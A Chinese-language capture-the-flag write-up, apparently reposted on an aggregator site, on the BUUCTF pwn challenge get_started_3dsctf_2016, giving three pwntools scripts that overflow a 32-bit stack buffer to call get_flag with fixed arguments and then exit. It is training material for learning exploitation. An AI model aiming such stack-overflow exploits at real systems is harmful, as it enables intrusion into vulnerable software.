[BUUCTF-pwn]——get_started_3dsctf_2016

• 題目地址:https://buuoj.cn/challenges#get_started_3dsctf_2016
• 題目:
  
  這道題讓我學(xué)到很多細節(jié),雖然又一次栽倒了沒有ebp的坑中

首先還是先checksec 一下看看,老樣子32位NX保護.

IDA中



看到這些,你是不是和我一樣覺得so easy!!! 我一開始也覺得這種題
payload = ‘a(chǎn)’ * offest + ‘junk’ + get_flag的地址 + ‘junk’ + get_flag的第一個參數(shù) + get_flag的第二個參數(shù)就好('junk’就是四個字節(jié),第一個是代替main的ebp,第二個代替get_flag的返回地址)
exploit就是

from pwn import * p = remote("node3.buuoj.cn",28584) context.log_level = 'debug' a1 = 0x308cd64f a2 = 0x195719d1 get_flag_addr = 0x080489A0 payload = 'a'* (0x38+0x4) + p32(get_flag_addr) + p32(0)+ p32(a1) + p32(a2) p.sendline(payload) p.recv() p.interactive()

可是不對,打不通我仔細觀察,發(fā)現(xiàn)這個main竟然沒有ebp

以前也遇到過但是沒有在意.修改下exploit

from pwn import * p = remote("node3.buuoj.cn",28584) context.log_level = 'debug' a1 = 0x308cd64f a2 = 0x195719d1 get_flag_addr = 0x080489A0 payload = 'a'* 0x38 + p32(get_flag_addr) + p32(0)+ p32(a1) + p32(a2) p.sendline(payload) p.recv() p.interactive()

發(fā)現(xiàn)還是打不通,想了好久都不可以. 查看一下別的人如何解決的發(fā)現(xiàn),get_flag不能正常返回就無法打印,俺也不知道為什么. C語言中有exit函數(shù)可以用來退出程序

再次將exploit修改一下

from pwn import * p = remote("node3.buuoj.cn",28584) context.log_level = 'debug' a1 = 0x308cd64f a2 = 0x195719d1 get_flag_addr = 0x080489A0 exit_addr = 0x0804E6A0 payload = 'a'* 0x38 + p32(get_flag_addr) + p32(exit_addr)+ p32(a1) + p32(a2) p.sendline(payload) p.recv() p.interactive()

成功!!! 太難了孩子 wuwuwu

總結(jié)

以上是生活随笔為你收集整理的[BUUCTF-pwn]——get_started_3dsctf_2016的全部內(nèi)容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯，歡迎將生活随笔推薦給好友。